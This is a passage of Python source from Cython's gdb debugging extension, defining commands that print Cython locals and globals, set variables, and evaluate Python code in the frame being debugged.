command_class = gdb.COMMAND_FILES
completer_class = gdb.COMPLETE_NONE
# @dispatch_on_frame(c_command='list')
def invoke(self, _, from_tty):
sd, lineno = self.get_source_desc()
source = sd.get_source(lineno - 5, lineno + 5, mark_line=lineno,
lex_entire=True)
print(source)
class CyPrint(CythonCommand):
"""
Print a Cython variable using 'cy-print x' or 'cy-print module.function.x'
"""
name = 'cy print'
command_class = gdb.COMMAND_DATA
def invoke(self, name, from_tty, max_name_length=None):
if self.is_python_function():
return gdb.execute('py-print ' + name)
elif self.is_cython_function():
value = self.cy.cy_cvalue.invoke(name.lstrip('*'))
for c in name:
if c == '*':
value = value.dereference()
else:
break
self.print_gdb_value(name, value, max_name_length)
else:
gdb.execute('print ' + name)
def complete(self):
if self.is_cython_function():
f = self.get_cython_function()
return list(itertools.chain(f.locals, f.globals))
else:
return []
sortkey = lambda item: item[0].lower()
class CyLocals(CythonCommand):
"""
List the locals from the current Cython frame.
"""
name = 'cy locals'
command_class = gdb.COMMAND_STACK
completer_class = gdb.COMPLETE_NONE
@dispatch_on_frame(c_command='info locals', python_command='py-locals')
def invoke(self, args, from_tty):
cython_function = self.get_cython_function()
if cython_function.is_initmodule_function:
self.cy.globals.invoke(args, from_tty)
return
local_cython_vars = cython_function.locals
max_name_length = len(max(local_cython_vars, key=len))
for name, cyvar in sorted(local_cython_vars.items(), key=sortkey):
if self.is_initialized(self.get_cython_function(), cyvar.name):
value = gdb.parse_and_eval(cyvar.cname)
if not value.is_optimized_out:
self.print_gdb_value(cyvar.name, value,
max_name_length, '')
class CyGlobals(CyLocals):
"""
List the globals from the current Cython module.
"""
name = 'cy globals'
command_class = gdb.COMMAND_STACK
completer_class = gdb.COMPLETE_NONE
@dispatch_on_frame(c_command='info variables', python_command='py-globals')
def invoke(self, args, from_tty):
global_python_dict = self.get_cython_globals_dict()
module_globals = self.get_cython_function().module.globals
max_globals_len = 0
max_globals_dict_len = 0
if module_globals:
max_globals_len = len(max(module_globals, key=len))
if global_python_dict:
max_globals_dict_len = len(max(global_python_dict))
max_name_length = max(max_globals_len, max_globals_dict_len)
seen = set()
print('Python globals:')
for k, v in sorted(global_python_dict.items(), key=sortkey):
v = v.get_truncated_repr(libpython.MAX_OUTPUT_LEN)
seen.add(k)
print(' %-*s = %s' % (max_name_length, k, v))
print('C globals:')
for name, cyvar in sorted(module_globals.items(), key=sortkey):
if name not in seen:
try:
value = gdb.parse_and_eval(cyvar.cname)
except RuntimeError:
pass
else:
if not value.is_optimized_out:
self.print_gdb_value(cyvar.name, value,
max_name_length, ' ')
class EvaluateOrExecuteCodeMixin(object):
"""
Evaluate or execute Python code in a Cython or Python frame. The 'evalcode'
method evaluations Python code, prints a traceback if an exception went
uncaught, and returns any return value as a gdb.Value (NULL on exception).
"""
def _fill_locals_dict(self, executor, local_dict_pointer):
"Fill a remotely allocated dict with values from the Cython C stack"
cython_func = self.get_cython_function()
for name, cyvar in cython_func.locals.items():
if cyvar.type == PythonObject and self.is_initialized(cython_func, name):
try:
val = gdb.parse_and_eval(cyvar.cname)
except RuntimeError:
continue
else:
if val.is_optimized_out:
continue
pystringp = executor.alloc_pystring(name)
code = '''
(PyObject *) PyDict_SetItem(
(PyObject *) %d,
(PyObject *) %d,
(PyObject *) %s)
''' % (local_dict_pointer, pystringp, cyvar.cname)
try:
if gdb.parse_and_eval(code) < 0:
gdb.parse_and_eval('PyErr_Print()')
raise gdb.GdbError("Unable to execute Python code.")
finally:
# PyDict_SetItem doesn't steal our reference
executor.xdecref(pystringp)
def _find_first_cython_or_python_frame(self):
frame = gdb.selected_frame()
while frame:
if (self.is_cython_function(frame) or
self.is_python_function(frame)):
frame.select()
return frame
frame = frame.older()
raise gdb.GdbError("There is no Cython or Python frame on the stack.")
def _evalcode_cython(self, executor, code, input_type):
with libpython.FetchAndRestoreError():
# get the dict of Cython globals and construct a dict in the
# inferior with Cython locals
global_dict = gdb.parse_and_eval(
'(PyObject *) PyModule_GetDict(__pyx_m)')
local_dict = gdb.parse_and_eval('(PyObject *) PyDict_New()')
try:
self._fill_locals_dict(executor,
libpython.pointervalue(local_dict))
result = executor.evalcode(code, input_type, global_dict,
local_dict)
finally:
executor.xdecref(libpython.pointervalue(local_dict))
return result
def evalcode(self, code, input_type):
"""
Evaluate `code` in a Python or Cython stack frame using the given
`input_type`.
"""
frame = self._find_first_cython_or_python_frame()
executor = libpython.PythonCodeExecutor()
if self.is_python_function(frame):
return libpython._evalcode_python(executor, code, input_type)
return self._evalcode_cython(executor, code, input_type)
class CyExec(CythonCommand, libpython.PyExec, EvaluateOrExecuteCodeMixin):
"""
Execute Python code in the nearest Python or Cython frame.
"""
name = '-cy-exec'
command_class = gdb.COMMAND_STACK
completer_class = gdb.COMPLETE_NONE
def invoke(self, expr, from_tty):
expr, input_type = self.readcode(expr)
executor = libpython.PythonCodeExecutor()
executor.xdecref(self.evalcode(expr, executor.Py_single_input))
class CySet(CythonCommand):
"""
Set a Cython variable to a certain value
cy set my_cython_c_variable = 10
cy set my_cython_py_variable = $cy_eval("{'doner': 'kebab'}")
This is equivalent to
set $cy_value("my_cython_variable") = 10
"""
name = 'cy set'
command_class = gdb.COMMAND_DATA
completer_class = gdb.COMPLETE_NONE
@require_cython_frame
def invoke(self, expr, from_tty):
name_and_expr = expr.split('=', 1)
if len(name_and_expr) != 2:
raise gdb.GdbError("Invalid expression. Use 'cy set var = expr'.")
varname, expr = name_and_expr
cname = self.cy.cy_cname.invoke(varname.strip())
gdb.execute("set %s = %s" % (cname, expr))
# Functions
class CyCName(gdb.Function, CythonBase):
"""
Get the C name of a Cython variable in the current context.
Examples:
print $cy_cname("function")
print $cy_cname("Class.method")
print $cy_cname("module.function")
"""
@require_cython_frame
@gdb_function_value_to_unicode
def invoke(self, cyname, frame=None):
frame = frame or gdb.selected_frame()
cname = None
if self.is_cython_function(frame):
cython_function = self.get_cython_function(frame)
if cyname in cython_function.locals:
cname = cython_function.locals[cyname].cname
elif cyname in cython_function.module.globals:
cname = cython_function.module.globals[cyname].cname
else:
qname = '%s.%s' % (cython_function.module.name, cyname)
if qname in cython_function.module.functions:
cname = cython_function.module.functions[qname].cname
if not cname:
cname = self.cy.functions_by_qualified_name.get(cyname)
if not cname:
raise gdb.GdbError('No such Cython variable: %s' % cyname)
return cname
class CyCValue(CyCName):
"""
Get the value of a Cython variable.
"""
@require_cython_frame
@gdb_function_value_to_unicode
def invoke(self, cyname, frame=None):
globals_dict = self.get_cython_globals_dict()
cython_function = self.get_cython_function(frame)
if self.is_initialized(cython_function, cyname):
cname = super(CyCValue, self).invoke(cyname, frame=frame)
return gdb.parse_and_eval(cname)
elif cyname in globals_dict:
return globals_dict[cyname]._gdbval
else:
raise gdb.GdbError("Variable %s is not initialized." % cyname)
class CyLine(gdb.Function, CythonBase):
"""
Get the current Cython line.
"""
@require_cython_frame
def invoke(self):
return self.get_cython_lineno()
class CyEval(gdb.Function, CythonBase, EvaluateOrExecuteCodeMixin):
"""
Evaluate Python code in the nearest Python or Cython frame and return
"""
@gdb_function_value_to_unicode
def invoke(self, python_expression):
input_type = libpython.PythonCodeExecutor.Py_eval_input
return self.evalcode(python_expression, input_type)
cython_info = CythonInfo()
cy = CyCy.register()
cython_info.cy = cy
def register_defines():
libpython.source_gdb_script(textwrap.dedent("""\
define cy step
cy -step
end
define cy next
cy -next
end
document cy step
%s
end
document cy next
%s
end
""") % (CyStep.__doc__, CyNext.__doc__))
register_defines()
| fabianrost84/cython | Cython/Debugger/libcython.py | Python | apache-2.0 | 44,948 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.